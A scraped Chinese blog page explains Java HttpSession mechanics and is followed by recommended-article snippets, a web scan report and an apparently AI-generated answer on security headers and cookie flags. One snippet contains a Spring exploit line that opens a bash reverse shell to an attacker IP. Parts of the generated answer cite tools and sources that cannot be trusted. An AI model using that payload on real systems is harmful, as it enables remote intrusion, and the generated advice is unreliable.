web - session/cookie/application

最新推荐文章于 2023-12-19 17:05:47 发布
最新推荐文章于 2023-12-19 17:05:47 发布
阅读量117 收藏
点赞数
CC 4.0 BY-SA版权
分类专栏: web app 文章标签: java
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/iteye_1865/article/details/82645056
本文详细阐述了HTTP Session的概念、创建、使用、删除、存放位置、ID生成与使用方式等核心内容,帮助开发者深入理解Session的工作原理。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

1. HTTP 中的 session 

session在web开发中是一个非常重要的概念,这个概念很抽象,很难定义,也是最让人迷惑的一个名词,也是最多被滥用的名字之一,在不同的场合,session一次的含义也很不相同。这里只探讨HTTP Session。
 
为了说明问题,这里基于Java Servlet理解Session的概念与原理,这里所说Servlet已经涵盖了JSP技术,因为JSP最终也会被编译为Servlet,两者有着相同的本质。
 
在Java中,HTTP的Session对象用javax.servlet.http.HttpSession来表示。
 
1、概念:Session代表服务器与浏览器的一次会话过程,这个过程是连续的,也可以时断时续的。在Servlet中,session指的是HttpSession类的对象,这个概念到此结束了,也许会很模糊,但只有看完本文,才能真正有个深刻理解。
 
2、Session创建的时间是:
一个常见的误解是以为session在有客户端访问时就被创建,然而事实是直到某server端程序调用 HttpServletRequest.getSession(true)这样的语句时才被创建,注意如果JSP没有显示的使用 <% @page session="false"%> 关闭session,则JSP文件在编译成Servlet时将会自动加上这样一条语句 HttpSession session = HttpServletRequest.getSession(true);这也是JSP中隐含的 session对象的来历。
由于session会消耗内存资源,因此,如果不打算使用session,应该在所有的JSP中关闭它。
 
引申:
1)、访问*.html的静态资源因为不会被编译为Servlet,也就不涉及session的问题。
2)、当JSP页面没有显式禁止session的时候,在打开浏览器第一次请求该jsp的时候,服务器会自动为其创建一个session,并赋予其一个sessionID,发送给客户端的浏览器。以后客户端接着请求本应用中其他资源的时候,会自动在请求头上添加:
Cookie:JSESSIONID=客户端第一次拿到的session ID
这样,服务器端在接到请求时候,就会收到session ID,并根据ID在内存中找到之前创建的session对象,提供给请求使用。这也是session使用的基本原理----搞不懂这个,就永远不明白session的原理。
下面是两次请求同一个jsp,请求头信息:
通过图可以清晰发现,第二次请求的时候,已经添加session ID的信息。
 
3、Session删除的时间是:
1)Session超时:超时指的是连续一定时间服务器没有收到该Session所对应客户端的请求,并且这个时间超过了服务器设置的Session超时的最大时间。
2)程序调用HttpSession.invalidate()
3)服务器关闭或服务停止
 
4、session存放在哪里:服务器端的内存中。不过session可以通过特殊的方式做持久化管理。
 
5、session的id是从哪里来的,sessionID是如何使用的:当客户端第一次请求session对象时候,服务器会为客户端创建一个session,并将通过特殊算法算出一个session的ID,用来标识该session对象,当浏览器下次(session继续有效时)请求别的资源的时候,浏览器会偷偷地将sessionID放置到请求头中,服务器接收到请求后就得到该请求的sessionID,服务器找到该id的session返还给请求者(Servlet)使用。一个会话只能有一个session对象,对session来说是只认id不认人。
 
6、session会因为浏览器的关闭而删除吗?
不会,session只会通过上面提到的方式去关闭。
 
7、同一客户端机器多次请求同一个资源,session一样吗?
一般来说,每次请求都会新创建一个session。
 
其实,这个也不一定的,总结下:对于多标签的浏览器(比如360浏览器)来说,在一个浏览器窗口中,多个标签同时访问一个页面,session是一个。对于多个浏览器窗口之间,同时或者相隔很短时间访问一个页面,session是多个的,和浏览器的进程有关。对于一个同一个浏览器窗口,直接录入url访问同一应用的不同资源,session是一样的。
 
8、session是一个容器,可以存放会话过程中的任何对象。
 
9、session因为请求(request对象)而产生,同一个会话中多个request共享了一session对象,可以直接从请求中获取到session对象。
 
10、其实,session的创建和使用总在服务端,而浏览器从来都没得到过session对象。但浏览器可以请求Servlet(jsp也是Servlet)来获取session的信息。客户端浏览器真正紧紧拿到的是session ID,而这个对于浏览器操作的人来说,是不可见的,并且用户也无需关心自己处于哪个会话过程中。
 

本文出自 “熔 岩” 博客,出处http://lavasoft.blog.51cto.com/62575/275589

 

2. http://www.cnblogs.com/jianglan/archive/2011/08/10/2133909.html

跨页传值系列之变量(Application/Session/Cookie)篇
xiongxinle的博客
01-04 365
一、应用场景 在网站建设中,有时需要将一个页面的信息提交给另一个页面进行运用。如:当 我们在浏览完商品信息后,往往需要将我们所选择的商品的关键字段Id发送到订单页 面以供结算。这时,就会用到跨页传值。跨页传值的方式有很多种,使用哪种方式取 决于网页跳转方式。 说明:在本主题中,我们将页面跳转前的页叫源页,将页面跳转后的页叫目标页。 下面介绍一下六种基本的跨页传值方式: (1)、源页公共属性值和控件读取方式:利用目标页的Previouspage属性引用源页, ...
漏洞复现—Spring CVE-2016-4977/CVE-2017-4971/CVE-2017-8046/CVE-2018-1270/CVE-2018-1273
weixin_45556536的博客
12-24 1567
CVE-2017-4971 // 注意反弹的端口和IP修改,反弹语句需要url编码 &_(new+java.lang.ProcessBuilder("bash","-c","bash+-i+>%26+/dev/tcp/攻击机IP/端口号+0>%261")).start()=vulhub
HTTP学习笔记——Session的原理和机制
xdk2166的博客
08-10 1129
HTTP学习笔记——Session的原理,机制Session的原理,机制什么是SessionSession的工作机制Session的缺陷结语 Session的原理,机制 什么是Session Session:在计算机中,尤其是在网络应用中,称为“会话控制”。Session对象存储特定用户会话所需的属性及配置信息。这样,当用户在应用程序的Web页之间跳转时,存储在Session对象中的变量将不会丢失,而是在整个用户会话中一直存在下去。当用户请求来自应用程序的 Web页时,如果该用户还没有会话,则Web服务器将
HttpSession工作原理简介
v5browser
05-08 393
HTTP协议(http://www.w3.org/Protocols/)是“一次性单向”协议。 服务端不能主动连接客户端,只能被动等待并答复客户端请求。客户端连接服务端,发出一个HTTP Request,服务端处理请求,并且返回一个HTTP Response给客户端,本次HTTP Request-Response Cycle结束。 我们看到,HTTP协议本身并不能支持服务端保存客户端的...
HTTP session的原理
weixin_42069523的博客
09-11 289
sessionweb在服务器中保存用户状态的一种方式。服务端维护session的两种方式: 1 在浏览器支持cookie的情况下,cookie保存sessionid。当程序需要为某个客户端的请求创建一个session的时候,服务器首先检查这个客户端的请求里是否已包含了一个session标识- 称为session id,如果已包含一个session id则说明以前已经为此客户端创建过session...
HTTP Session原理
懒懒的小猴子的专栏
04-18 962
一、术语session 在我的经验里,session这个词被滥用的程度大概仅次于transaction,更加有趣的是transaction与session在某些语境下的含义是相同的。   session,中文经常翻译为会话,其本来的含义是指有始有终的一系列动作/消息,比如打电话时从拿起电话拨号到挂断电话这中间的一系列过程可以称之为一个session。有时候我们可以看到这样的话“在一个浏览器会
composer更新yii报错 yiisoft/yii2 2.0.29 requires bower-asset/inputmask ~3.2.2 | ~3.3.5 -
____
07-13 939
报错信息 composer 升级yii2到最新版本,报错信息 yiisoft/yii2 2.0.29 requires bower-asset/inputmask ~3.2.2 | ~3.3.5 -> no matching package found. 解决办法 composer self-update 1.9.0 composer global require "fxp/composer-asset-plugin:1.3.1" composer clear-cache composer upda
Java Web应用(JSP/Session/Cookie)
cherysling的博客
02-20 288
JSP本质上就是一个Servlet,JSP主要负责与用户交互,将最终的界面呈现用户,HTML+JS+Java的混合文件。——>前后端不分离原理:当服务器接收到后缀.jsp文件请求时,将该请求交给JSP引擎去处理,每个JSP页面被第一次访问,JSP引擎会将它翻译成Servlet文件(存于work),再由Web容器调用Servlet完成响应。
pageContext-request-session-application的使用及区别
10-10
Web开发中,`pageContext`, `request`, `session`, 和 `application` 是四个非常重要的内置对象,它们分别代表了不同作用域内的数据存储空间。理解这些对象的生命周期及其使用范围对于有效地管理Web应用的状态至关...
理解http session
metas_wzh的专栏
03-09 2167
理解session机制session机制是一种服务器端的机制,服务器使用一种类似于散列表的结构(也可能就是使用散列表)来保存信息。当程序需要为某个客户端的请求创建一个session的时候,服务器首先检查这个客户端的请求里是否已包含了一个session标识 - 称为 session id,如果已包含一个session id则说明以前已经为此客户端创建过session,服务器就按照session id
HttpSession 原理
indieinside的专栏
11-05 680
使用HttpSession進行會話管理十分方便,讓Web應用程式看似可以「記得」是瀏覽器發出的請求,連接數個請求間的關係。但無論如何,Web應用程式是基於HTTP協定的事實並沒有改變,實際上如何「得知」數個請求之間的關係,這件工作是由Web容器幫你執行。 當你嘗試執行HttpServletRequest的getSession()時,Web容器會為你建立HttpSession物件,關鍵在於每個Ht
理解HTTP session原理及应用
Johan_欧巴 在成长
01-15 268
理解HTTP session原理及应用 转自:http://www.2cto.com/kf/201206/135471.html 一、术语session 在我的经验里,session这个词被滥用的程度大概仅次于transaction,更加有趣的是transaction与session在某些语境下的含义是相同的。 session,中文经常翻译为会话,其本来的含义是指有始有终的一系列动作/消息,比如打...
HttpSession工作原理
weixin_52104995的博客
12-19 467
实际上,在客户端浏览器第一次访问时,服务器端会创建一个会话对象(HttpSession),并为该会话生成一个唯一的Session ID(通常是一个长字符串)。需要强调的是,HttpSession对象在服务器端创建并保存,会话数据也保存在服务器端。服务器端根据Session ID识别客户端和对应的会话对象,从而实现会话跟踪和存储会话数据。服务器端接收到请求后会根据请求中的Session ID找到对应的会话对象,并从服务器端的会话管理器中获取该会话对象的数据。这样,服务器端就实现了会话的跟踪。
httpsession详解(会话追踪原理)
东方
09-24 1697
会话跟踪:服务器端的技术: HttpSession对象: 1:原理:客户端浏览器第一次访问,服务器端创建一个会话对象。并且具有id的唯一值。 依赖cookiesessionId的值发送给客户端。 第二次请求的时候,客户端浏览器携带sessionId到服务器。服务器端获得sessionId, 从而实现了会话跟踪: ...
HttpSession每次访问都创建新的session
believer123的专栏
08-24 7107
今天遇到一个很奇怪的问题!就是我的jsp页面上每次刷新浏览器都会有不同的id! 非常奇怪,配置又都没有问题!而且我的工程名称为@MVC! 经过多次试验将工程名称改为MVC后每次刷新页面sessionId都相同了!非常奇怪!为什么加了个@就会每次都创建一个新的session呢? 有待解答。。。。
Session
07-03 747
目 录 一、Session 二、Cookies 三、Cookies机制 四、Session机制 五、Cookies机制与Session机制的区别和联系 六、常见问题 七、Session的用法 SessionWEB上有效的信息交互手段,因其使用方便、稳定、安全
请求中的cookiesession和token
flying meng的菜鸟居
05-10 1767
首先要明确几个概念: 这三个的诞生源于“HTTP是一个无状态的协议”; session是保存到服务端的,而cookie是保存到客户端的(通常说“cookie是实现session的一种方案”或者说“cookie是客户端保存session的载体”); token和前两者不同; sessioncookie 其目的是在http的无状态性下,为了使某个域名下的所有网页能够共享某些数据产生的一种手段。它们在客户端对服务端的访问中的运作方式如下: 客户端发送的请求在被服务器端接受后,会在服务端建立一个sessi
浏览器每次请求都会创建新的session问题
qq_42314022的博客
08-09 3950
情况: 近期在项目中遇到request.getSession().setAttribute()后,getAttribute拿不到值的情况,总是报空指针异常,打印后发现每次请求都会创建新的session 使用IE浏览器后发现是正常的,Chrome浏览器就会有问题 原因: 80版本的chrome为了增强安全性,新增了一个SameSite的属性导致的。 解决方法: 点击链接查看 谷歌浏览器新版本Chrome 80默认SameSite导致跨域登录状态失效的问题https://blog.youkuaiyun.com/sinat_
--------------------------------------------------------------------------- + Target IP: 107.173.186.2 + Target Hostname: pikachu.bachang.org + Target Port: 443 --------------------------------------------------------------------------- + SSL Info: Subject: /CN=pikachu.bachang.org Ciphers: TLS_AES_256_GCM_SHA384 Issuer: /C=NO/O=Buypass AS-983163327/CN=Buypass Class 2 CA 5 + Start Time: 2025-07-09 08:43:45 (GMT-4) --------------------------------------------------------------------------- + Server: openresty + /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options + /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/ + /: Cookie PHPSESSID created without the secure flag. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Cookies + /: Cookie PHPSESSID created without the httponly flag. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Cookies
最新发布
07-10
<think>我们正在分析Pikachu靶场(pikachu.bachang.org:443)的安全扫描结果,重点关注安全响应头和Cookie安全设置问题,并获取修复建议。 根据引用[2],Pikachu靶场本身包含多种漏洞,但我们现在关注的是安全响应头(如CSP, HSTS等)和Cookie安全属性(如Secure, HttpOnly等)的缺失问题。 步骤: 1. 使用工具(如浏览器开发者工具、curl或专门的安全扫描工具)获取目标网站的HTTP响应头信息。 2. 检查常见安全响应头是否缺失,包括: - Content Security Policy (CSP) - Strict-Transport-Security (HSTS) - X-Content-Type-Options - X-Frame-Options - X-XSS-Protection - Referrer-Policy 3. 检查Cookie的安全属性,包括: - Secure属性(仅通过HTTPS传输) - HttpOnly属性(防止JavaScript访问) - SameSite属性(防止跨站请求伪造) 4. 根据缺失情况给出修复建议。 由于我们无法直接扫描该网站,这里提供通用方法,并假设我们已通过工具获取到以下信息(示例): 假设我们通过curl命令获取响应头: ```bash curl -I https://pikachu.bachang.org ``` 示例响应头(可能): ``` HTTP/1.1 200 OK Server: nginx Date: ... Content-Type: text/html Connection: keep-alive Set-Cookie: session_id=abc123; Path=/; Domain=pikachu.bachang.org ``` 分析: 1. 安全响应头缺失: 从示例中,我们未看到CSP、HSTS等安全响应头。 2. Cookie设置: 示例中的Cookiesession_id)缺少Secure、HttpOnly和SameSite属性。 修复建议: 一、安全响应头设置建议: 1. **CSP (Content Security Policy)**: 作用:防止XSS攻击,限制资源加载来源。 建议设置:`Content-Security-Policy: default-src 'self'; script-src 'self' 'unsafe-inline'; style-src 'self' 'unsafe-inline'; img-src 'self' data:;` 根据实际需求调整,避免过度使用`unsafe-inline`。 2. **HSTS (Strict-Transport-Security)**: 作用:强制浏览器使用HTTPS访问,防止中间人攻击。 建议设置:`Strict-Transport-Security: max-age=31536000; includeSubDomains` 3. **X-Content-Type-Options**: 作用:防止浏览器MIME类型嗅探。 建议设置:`X-Content-Type-Options: nosniff` 4. **X-Frame-Options**: 作用:防止点击劫持。 建议设置:`X-Frame-Options: SAMEORIGIN` 或 `DENY` 5. **X-XSS-Protection**: 注意:现代浏览器已弃用,但部分旧版浏览器仍支持。建议使用CSP替代,如需设置: `X-XSS-Protection: 1; mode=block` 6. **Referrer-Policy**: 作用:控制Referer头的发送,保护隐私。 建议设置:`Referrer-Policy: same-origin` 二、Cookie安全属性设置建议: 1. **Secure属性**:确保Cookie只在HTTPS连接中传输。 修复:`Set-Cookie: session_id=abc123; Path=/; Secure;` 2. **HttpOnly属性**:防止JavaScript通过`document.cookie`访问,减少XSS攻击窃取Cookie的风险。 修复:`Set-Cookie: session_id=abc123; Path=/; Secure; HttpOnly;` 3. **SameSite属性**:防止CSRF攻击,建议设置为`Strict`或`Lax`。 修复:`Set-Cookie: session_id=abc123; Path=/; Secure; HttpOnly; SameSite=Lax;` 具体配置方法(以Nginx服务器为例): 在Nginx配置文件中(如`/etc/nginx/conf.d/pikachu.conf`)的server块内添加: ```nginx server { listen 443 ssl; server_name pikachu.bachang.org; # 安全响应头设置 add_header Content-Security-Policy "default-src 'self'; script-src 'self' 'unsafe-inline'; style-src 'self' 'unsafe-inline'; img-src 'self' data:;"; add_header Strict-Transport-Security "max-age=31536000; includeSubDomains"; add_header X-Content-Type-Options "nosniff"; add_header X-Frame-Options "SAMEORIGIN"; add_header Referrer-Policy "same-origin"; # 应用程序生成的Cookie需要应用程序设置,但若通过代理设置Cookie则可在Nginx中设置 # 若Cookie由后端应用设置,则需修改应用代码(如PHP:setcookie时设置Secure和HttpOnly) location / { # 其他配置... } } ``` 对于Cookie设置,如果应用程序由PHP编写(如Pikachu靶场),则应在设置Cookie时添加参数: ```php setcookie("session_id", "abc123", [ 'path' => '/', 'domain' => 'pikachu.bachang.org', 'secure' => true, // 仅HTTPS 'httponly' => true, // 禁止JS访问 'samesite' => 'Lax' // SameSite策略 ]); ``` 验证方法: 使用浏览器开发者工具(F12)的Network选项卡,查看响应头是否包含上述安全头,以及Cookie属性是否正确。 注意:在修改配置后,务必重启Web服务器(如Nginx)或重新加载配置。 如果扫描结果中还有其他具体问题,请提供详细信息以便进一步分析。 相关问题: 1. 如何检测网站是否启用了HSTS? 2. 如何测试CSP策略的有效性? 3. 如何验证Cookie的HttpOnly属性是否生效? 4. 在Apache服务器中如何设置安全响应头?</think>### 分析Pikachu靶场扫描结果中的安全响应头与Cookie问题 #### 一、获取扫描结果的方法 1. **使用浏览器开发者工具** 访问 `https://pikachu.bachang.org:443` 后: ```bash F12 → Network标签 → 刷新页面 → 点击任意请求 → 查看Headers ``` - **安全响应头检查**:查看`Response Headers`区域 - **Cookie检查**:查看`Set-Cookie`字段 *示例:缺少CSP头时显示`Content-Security-Policy: none`[^1]* 2. **命令行工具检测** 使用cURL检查响应头: ```bash curl -I https://pikachu.bachang.org:443 ``` 使用专用工具检查Cookie安全属性: ```bash # 安装cookie安全扫描工具 npm install -g cookie-scanner cookie-scanner https://pikachu.bachang.org:443 ``` --- #### 二、关键安全问题分析 ##### 安全响应头缺失问题 | 缺失头 | 风险等级 | 检测位置 | 典型表现 | |------------------|----------|------------------------|--------------------------| | `Content-Security-Policy` | 高危 | Response Headers | 无XSS防护策略[^2] | | `Strict-Transport-Security` | 高危 | HTTPS响应头 | 未强制HTTPS | | `X-Content-Type-Options` | 中危 | 所有页面响应头 | 缺少`nosniff`防MIME嗅探 | | `X-Frame-Options` | 中危 | 页面加载响应头 | 未设置`DENY`防点击劫持 | ##### Cookie安全设置问题 | 问题类型 | 检测方法 | 风险影响 | |------------------|------------------------------|--------------------------| | 缺失`Secure`属性 | `Set-Cookie`字段无Secure标记 | Cookie可能被HTTP明文传输 | | 缺失`HttpOnly` | 开发者工具→ApplicationCookies | XSS可窃取Cookie | | 缺失`SameSite` | Cookie值中无SameSite=Lax/Strict | CSRF攻击风险增大 | --- #### 三、修复建议与实施步骤 ##### 安全响应头修复方案 1. **CSP头配置**(防XSS) ```nginx # Nginx配置示例 add_header Content-Security-Policy "default-src 'self'; script-src 'nonce-{随机值}'"; ``` *需根据业务调整资源加载策略[^1]* 2. **HSTS强制HTTPS** ```nginx add_header Strict-Transport-Security "max-age=31536000; includeSubDomains"; ``` 3. **基础防护头** ```nginx add_header X-Frame-Options "DENY"; add_header X-Content-Type-Options "nosniff"; ``` ##### Cookie安全加固方案 1. **PHP代码修复**(Pikachu为PHP平台) ```php // 设置安全Cookie setcookie("sessionid", $value, [ 'secure' => true, // 仅HTTPS传输 'httponly' => true, // 禁止JS访问 'samesite' => 'Lax' // 防CSRF ]); ``` 2. **Nginx代理层修复** ```nginx proxy_cookie_path / "/; Secure; HttpOnly; SameSite=Lax"; ``` --- #### 四、验证修复效果 1. **响应头验证工具** ```bash # 使用安全头扫描工具 npx security-headers scan https://pikachu.bachang.org:443 ``` *输出评分A+为修复成功* 2. **Cookie验证方法** - 浏览器控制台输入`document.cookie`应返回空字符串(HttpOnly生效) - 使用HTTP访问应无Cookie传输(Secure生效) --- ### 典型问题修复前后对比 | 安全项 | 修复前 | 修复后 | |----------------|--------------------------------|--------------------------------| | CSP头 | 缺失 → XSS漏洞可利用 | `default-src 'self'` → 阻断恶意脚本 | | Cookie的Secure | 未设置 → 明⽂传输 | Secure=true → 仅HTTPS加密传输 | | SameSite | 未声明 → CSRF攻击成功 | SameSite=Lax → 阻断跨站提交 | > **注意**:Pikachu靶场本身包含训练用漏洞,实际生产环境需在修复后重新扫描验证[^1][^2]。 --- ### 相关问题 1. 如何为Apache服务器配置HSTS安全响应头? 2. 当业务需要跨域资源加载时,如何安全配置CSP策略? 3. SameSite=None的场景下如何保证Cookie安全? 4. 如何自动化监控响应头安全状态? [^1]: Pikachu靶场提供多种漏洞环境用于安全测试 [^2]: 安全响应头缺失会显著增加XSS/CSRF等攻击风险
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值